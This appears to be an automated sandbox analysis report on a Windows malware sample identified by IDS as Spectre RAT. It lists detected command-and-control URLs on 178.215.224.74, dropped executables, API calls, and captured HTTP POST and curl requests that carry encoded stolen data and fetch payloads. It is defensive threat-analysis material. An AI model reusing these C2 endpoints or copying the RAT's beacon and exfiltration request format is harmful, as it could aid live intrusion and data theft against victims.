barindex
Antivirus detection for URL or domain
Source: http://178.215.224.74/v10/ukyh.php?jspo=6ecur32.dllAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=9A5605DE11447A0E2031624EE8FBDEAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=e3ad1d0b2449c169e66efe472513a377*6&jwvs=9A5605DE11447A0E2031624EE8FBDEAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?giAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=6ecur32.dllrAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=8Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=7Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=5Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=trueAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1%Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=5W5Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3DbAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.phpAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.8Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=3&jwvs=9A5605DE11447A0E2031624EE8FBDE&vprl=2Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.uAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=31Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3DAvira URL Cloud: Label: malware
Source: http://178.215.224.252/v10/ukyhAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhlAvira URL Cloud: Label: malware
Source: http://178.215.224.252/v10/ukyh.php?jspo=6Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?gi.224.74ur32.dllAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3DAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?uvyw=6Avira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmlAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=33&jwvs=9A5605DE11447A0E2031624EE8FBDEAvira URL Cloud: Label: malware
Source: http://178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=9A5605DE11447A0E2031624EE8FBDE&bsxa=1Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeReversingLabs: Detection: 58%
Multi AV Scanner detection for submitted file
Source: vqMMwqCFZQ.exeReversingLabs: Detection: 66%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.8% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exeJoe Sandbox ML: detected
Source: vqMMwqCFZQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: vqMMwqCFZQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C.pdb source: azvw.exe, 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp, nircmdc.exe.50.dr
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_0041C29C FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,50_2_0041C29C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeCode function: 50_2_004107A0 FindFirstFileA,50_2_004107A0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_004062D5 FindFirstFileW,FindClose,86_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_00402E18 FindFirstFileW,86_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeCode function: 86_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,86_2_00406C9B
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\139918\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\139918Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2853767 - Severity 1 - ETPRO MALWARE Win32/Spectre RAT CnC Activity M1 : 192.168.2.4:49874 -> 178.215.224.74:80
Source: Network trafficSuricata IDS: 2853768 - Severity 1 - ETPRO MALWARE Win32/SpectreRAT CnC Activity M2 : 192.168.2.4:49874 -> 178.215.224.74:80
Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
Source: unknownDNS traffic detected: query: GyxNFpxuLvDE.GyxNFpxuLvDE replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mCpLognXwrhUlFWj.mCpLognXwrhUlFWj replaycode: Name error (3)
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 625Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 6a 45 38 4b 45 45 79 58 46 64 78 5a 33 42 78 58 6d 70 74 5a 6d 31 78 58 6b 46 79 63 45 52 68 64 47 46 63 55 47 64 6a 62 57 6c 75 5a 56 35 45 62 32 35 77 61 47 6c 73 52 48 31 74 63 6e 46 63 4d 6a 73 79 4d 6a 4a 48 4d 6a 49 76 4d 6b 4d 77 4d 43 38 38 4e 7a 45 7a 4a 54 51 78 53 6a 6c 5a 51 6c 38 7a 4d 6a 49 71 4d 7a 67 34 4f 7a 45 71 64 57 6c 75 5a 47 39 33 63 79 4a 73 5a 32 5a 6c 62 6d 5a 6e 63 6c 74 43 58 54 45 77 4d 69 6f 35 4d 44 49 7a 4d 43 6f 7a 4e 7a 6f 73 4d 44 45 33 4c 44 41 79 4e 43 34 77 50 54 42 62 51 46 55 7a 4d 6a 67 71 4d 7a 49 79 4d 7a 41 6f 4d 54 55 77 4a 6a 41 7a 4e 53 77 79 4d 6a 51 75 4e 7a 52 5a 53 46 38 78 4d 44 41 6f 4d 7a 41 77 4d 7a 45 71 4d 54 55 34 4a 6a 49 7a 4e 79 34 79 4d 44 51 73 4e 54 5a 62 51 6c 38 77 4b 6a 49 77 4e 79 4a 42 4f 6c 78 64 63 57 64 36 63 31 35 6f 62 57 78 6e 63 56 78 44 65 48 68 47 59 33 52 6a 58 46 4a 76 59 57 31 70 62 47 39 65 52 47 39 73 63 6d 70 70 62 6b 5a 31 62 58 42 78 58 47 6c 36 64 48 55 75 5a 58 70 6c 57 55 4a 66 4d 54 49 79 4b 44 45 77 4d 44 4d 35 4b 44 45 33 4d 43 77 77 4f 54 55 73 4d 44 41 32 4c 44 55 30 57 55 68 56 4d 43 67 79 4d 6a 55 71 51 7a 70 63 56 58 46 74 63 48 4e 63 61 6d 31 73 5a 58 4e 65 51 58 42 77 52 6d 46 38 59 56 35 51 62 32 46 76 61 57 78 6c 58 6b 52 74 62 6e 4a 6f 61 57 35 47 66 57 39 77 63 31 52 36 61 6e 39 78 4c 48 68 72 63 6c 6c 43 58 54 4d 34 4f 43 67 7a 4d 44 4d 79 4d 79 70 44 4f 6c 78 58 65 32 64 79 63 31 78 6f 62 57 35 6c 63 56 78 42 63 48 4a 45 61 58 52 6a 58 6c 4a 76 59 32 31 72 62 47 56 63 52 6d 31 75 63 47 68 70 62 45 78 33 62 58 42 37 58 6e 70 67 64 33 4d 73 65 47 74 79 57 55 42 66 4f 54 67 79 4b 44 45 79 4d 44 45 78 4b 6a 45 33 4f 69 59 77 4d 54 55 75 4d 44 41 30 4c 6a 55 30 57 30 42 66 Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTAwKDkyMjE8KEEyXFdxZ3BxXmptZm1xXkFycERhdGFcUGdjbWluZV5Eb25waGlsRH1tcnFcMjsyMjJHMjIvMkMwMC88NzEzJTQxSjlZQl8zMjIqMzg4OzEqdWluZG93cyJsZ2ZlbmZncltCXTEwMio5MDIzMCozNzosMDE3LDAyNC4wPTBbQFUzMjgqMzIyMzAoMTUwJjAzNSwyMjQuNzRZSF8xMDAoMzAwMzEqMTU4JjIzNy4yMDQsNTZbQl8wKjIwNyJBOlxdcWd6c15obWxncVxDeHhGY3RjXFJvYW1pbG9eRG9scmppbkZ1bXBxXGl6dHUuZXplWUJfMTIyKDEwMDM5KDE3MCwwOTUsMDA2LDU0WUhVMCgyMjUqQzpcVXFtcHNcam1sZXNeQXBwRmF8YV5Qb2FvaWxlXkRtbnJoaW5GfW9wc1R6an9xLHhrcllCXTM4OCgzMDMyMypDOlxXe2dyc1xobW5lcVxBcHJEaXRjXlJvY21rbGVcRm1ucGhpbEx3bXB7Xnpgd3MseGtyWUBfOTgyKDEyMDExKjE3OiYwMTUuMDA0LjU0W0Bf
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 237Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 34 33 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 41 74 4d 44 35 5a 51 46 31 4c 52 6c 6c 49 58 54 6f 73 4e 6a 51 73 4d 7a 49 78 4a 6a 38 33 57 55 42 66 4d 54 41 75 4d 44 45 33 4d 6a 67 79 57 30 42 64 51 54 68 63 56 58 46 6c 63 6e 4e 65 61 6d 64 75 5a 33 46 63 51 58 4a 77 52 6d 4e 32 59 56 35 4f 62 57 4e 68 62 46 35 63 5a 32 31 77 56 44 4d 78 4d 54 6b 7a 4f 6c 35 58 63 43 78 77 61 32 35 54 51 6c 39 44 4f 46 78 56 63 32 56 79 63 31 35 69 62 57 35 6c 63 31 35 44 63 48 42 47 59 58 52 68 58 6b 78 6e 59 32 4e 75 58 46 52 6e 62 58 4a 65 4d 7a 4d 37 4f 7a 4d 34 58 46 56 77 4a 6e 4a 70 5a 67 25 33 44 25 33 44 Data Ascii: jspo=43&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTAtMD5ZQF1LRllIXTosNjQsMzIxJj83WUBfMTAuMDE3MjgyW0BdQThcVXFlcnNeamduZ3FcQXJwRmN2YV5ObWNhbF5cZ21wVDMxMTkzOl5XcCxwa25TQl9DOFxVc2Vyc15ibW5lc15DcHBGYXRhXkxnY2NuXFRnbXJeMzM7OzM4XFVwJnJpZg%3D%3D
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 527Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 30 6f 57 30 42 56 4d 7a 49 34 4b 6a 4d 79 4d 6a 4d 7a 4b 44 45 31 4d 43 59 77 4d 7a 55 73 4d 6a 49 30 4c 6a 63 30 57 55 68 66 4d 54 41 7a 4b 44 4d 77 4d 6a 49 31 4b 6c 4a 6e 64 6d 31 75 64 32 64 45 5a 58 52 70 59 57 64 78 4c 6d 64 36 5a 31 74 41 58 54 4d 34 4d 69 6f 78 4f 44 49 7a 4f 53 6f 7a 4e 54 6f 73 4d 44 4d 31 4c 44 6f 36 4e 69 77 33 4e 6c 74 41 58 54 49 71 4d 6a 49 39 4b 45 4d 36 58 46 64 78 5a 58 4a 78 58 47 70 76 62 47 56 37 58 45 4e 79 63 45 52 6a 64 47 4e 65 54 6d 39 68 59 32 35 63 64 47 56 76 65 46 35 53 5a 58 35 6e 62 48 31 6c 52 6d 64 30 61 32 46 6e 63 79 78 74 63 47 64 5a 51 46 38 34 4b 6a 45 77 4d 79 70 42 4d 6c 35 56 63 32 56 77 63 56 78 71 62 57 35 6c 63 31 35 42 65 48 42 47 59 33 52 68 58 6b 78 74 59 57 4e 73 58 6e 5a 6e 62 58 42 63 55 47 31 30 5a 57 35 39 5a 30 5a 74 64 6d 74 68 5a 33 45 73 5a 33 68 6e 55 30 68 66 4d 7a 41 79 4b 6a 59 71 57 30 42 64 4d 7a 67 79 4b 6a 45 77 4d 6a 4d 78 4b 6a 4d 33 4f 43 34 77 4d 54 30 75 4d 44 41 30 4c 6a 55 30 57 55 4a 66 4d 54 49 79 4b 44 45 77 4d 44 4d 37 4b 44 45 31 55 30 4a 66 4f 54 41 79 4b 44 4d 79 4d 6a 4d 78 4b 44 6b 25 32 46 4f 69 77 79 4d 7a 55 75 4d 6a 49 30 4c 6a 55 38 57 55 42 64 4d 54 49 78 4b 6a 45 79 4d 6a 41 79 4b 46 4a 74 64 6d 64 73 64 57 56 47 5a 58 52 72 59 57 56 78 4c 47 64 34 5a 56 74 43 56 54 4d 77 4d 43 49 7a 4d 6a 67 78 4d 79 67 7a 4e 54 6f 73 4d 6a 4d 39 4a 6a 41 77 4e 43 77 33 4e 46 74 41 58 51 25 33 44 25 33 44 Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTAwKD0oW0BVMzI4KjMyMjMzKDE1MCYwMzUsMjI0Ljc0WUhfMTAzKDMwMjI1KlJndm1ud2dEZXRpYWdxLmd6Z1tAXTM4MioxODIzOSozNTosMDM1LDo6Niw3NltAXTIqMjI9KEM6XFdxZXJxXGpvbGV7XENycERjdGNeTm9hY25cdGVveF5SZX5nbH1lRmd0a2FncyxtcGdZQF84KjEwMypBMl5Vc2VwcVxqbW5lc15BeHBGY3RhXkxtYWNsXnZnbXBcUG10ZW59Z0ZtdmthZ3EsZ3hnU0hfMzAyKjYqW0BdMzgyKjEwMjMxKjM3OC4wMT0uMDA0LjU0WUJfMTIyKDEwMDM7KDE1U0JfOTAyKDMyMjMxKDk%2FOiwyMzUuMjI0LjU8WUBdMTIxKjEyMjAyKFJtdmdsdWVGZXRrYWVxLGd4ZVtCVTMwMCIzMjgxMygzNTosMjM9JjAwNCw3NFtAXQ%3D%3D
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 416Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 39 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 61 6d 39 75 5a 33 74 5a 51 46 31 48 55 53 4a 47 59 57 39 6e 4f 43 49 69 49 69 41 69 4b 43 67 69 49 69 41 69 49 43 41 67 49 43 41 67 49 69 68 50 61 57 4e 79 62 58 46 76 5a 6e 59 67 56 32 6c 73 5a 47 64 33 63 53 49 78 4d 43 4a 51 63 47 31 5a 51 46 38 7a 4d 69 34 77 4d 54 55 34 4d 6a 42 62 53 46 38 79 4f 54 6b 30 4d 54 64 5a 51 6c 39 44 4f 46 52 64 63 57 64 79 63 56 78 71 62 32 35 6c 63 31 35 4a 63 6e 42 45 59 58 5a 6a 58 45 78 74 59 32 46 73 58 6c 52 74 62 58 4a 65 4d 54 4d 37 4f 54 4d 36 58 6c 56 77 4c 48 4a 70 5a 6c 74 43 56 55 45 36 58 46 31 78 5a 33 70 7a 58 6d 68 74 62 47 64 78 58 45 4e 34 65 45 5a 6a 64 47 4e 63 54 47 39 6a 59 57 78 65 58 47 64 74 63 46 77 7a 4d 54 6b 35 4d 7a 68 63 56 58 41 75 65 47 6c 6b 57 55 42 64 4d 7a 41 76 4d 44 52 62 51 6c 39 42 52 46 74 41 58 33 78 77 64 57 56 54 51 6c 39 75 59 57 35 78 5a 31 6c 43 58 7a 67 73 50 44 34 73 4d 7a 49 78 4c 6a 63 31 57 30 42 64 57 55 68 66 51 7a 70 63 56 33 46 6c 63 6e 46 63 61 6d 39 73 5a 58 74 63 51 33 4a 77 52 47 4e 30 59 31 35 51 62 32 4e 76 61 32 35 6e 58 45 5a 6e 62 6e 42 6f 59 57 78 47 66 57 31 79 63 51 25 33 44 25 33 44 Data Ascii: jspo=9&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=am9uZ3tZQF1HUSJGYW9nOCIiIiAiKCgiIiAiICAgICAgIihPaWNybXFvZnYgV2lsZGd3cSIxMCJQcG1ZQF8zMi4wMTU4MjBbSF8yOTk0MTdZQl9DOFRdcWdycVxqb25lc15JcnBEYXZjXExtY2FsXlRtbXJeMTM7OTM6XlVwLHJpZltCVUE6XF1xZ3pzXmhtbGdxXEN4eEZjdGNcTG9jYWxeXGdtcFwzMTk5MzhcVXAueGlkWUBdMzAvMDRbQl9BRFtAX3xwdWVTQl9uYW5xZ1lCXzgsPD4sMzIxLjc1W0BdWUhfQzpcV3FlcnFcam9sZXtcQ3JwRGN0Y15Qb2Nva25nXEZnbnBoYWxGfW1ycQ%3D%3D
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 335Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 44 45 34 4b 44 4d 25 32 46 4f 43 77 77 4d 7a 63 73 4d 44 49 32 4a 6a 6f 33 4d 46 74 43 58 54 45 77 4d 43 6f 78 4d 6a 67 7a 4d 69 6f 78 4e 54 6f 75 4d 6a 4d 31 4c 6a 49 77 4e 43 59 33 4e 6c 6c 41 58 54 4d 77 4d 69 67 7a 4d 44 49 7a 4d 79 6f 78 4e 7a 6f 6d 4d 44 45 31 4a 6a 41 77 50 43 34 31 4e 6c 6c 43 58 7a 41 71 4d 44 67 39 4b 45 45 36 58 6c 56 7a 5a 58 4a 7a 58 47 68 6e 62 47 56 7a 58 45 4e 79 63 45 52 6a 64 47 46 63 55 47 39 70 62 57 74 73 5a 31 78 47 62 32 35 79 61 6d 6c 73 52 6e 64 74 63 48 4e 65 65 58 74 31 63 43 5a 34 61 33 68 62 51 6c 38 7a 4d 6a 49 6f 4d 54 49 35 4f 6a 45 6f 51 7a 68 63 56 58 4e 6c 63 6e 4e 65 59 6d 31 75 5a 58 4e 65 51 33 42 77 52 6d 46 30 59 56 35 53 5a 32 46 76 61 32 35 6e 58 6b 52 74 62 6e 4a 6f 61 32 78 47 64 57 31 77 63 56 52 7a 65 58 56 34 4c 48 68 68 63 46 6c 43 58 77 25 33 44 25 33 44 Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTAwKDkyMDE4KDM%2FOCwwMzcsMDI2Jjo3MFtCXTEwMCoxMjgzMioxNTouMjM1LjIwNCY3NllAXTMwMigzMDIzMyoxNzomMDE1JjAwPC41NllCXzAqMDg9KEE6XlVzZXJzXGhnbGVzXENycERjdGFcUG9pbWtsZ1xGb25yamlsRndtcHNeeXt1cCZ4a3hbQl8zMjIoMTI5OjEoQzhcVXNlcnNeYm1uZXNeQ3BwRmF0YV5SZ2Fva25nXkRtbnJoa2xGdW1wcVRzeXV4LHhhcFlCXw%3D%3D
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 8387Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 2463Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 1699Cache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 133Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 49 33 4b 44 6b 7a 4d 43 70 4c 4f 46 35 64 63 32 64 77 63 56 35 6f 62 57 35 6e 65 31 52 44 63 6e 42 47 59 58 52 68 58 46 4a 76 59 32 56 72 62 6d 64 63 54 32 31 36 61 57 35 73 59 56 78 45 61 58 70 6c 5a 47 31 34 58 46 6c 41 58 77 25 33 44 25 33 44 Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTI3KDkzMCpLOF5dc2dwcV5obW5ne1RDcnBGYXRhXFJvY2VrbmdcT216aW5sYVxEaXplZG14XFlAXw%3D%3D
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php?uvyw=6 HTTP/1.1Content-Type: multipart/form-data; boundary=----974767299852498929531610575User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 29747Cache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.252User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=5 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
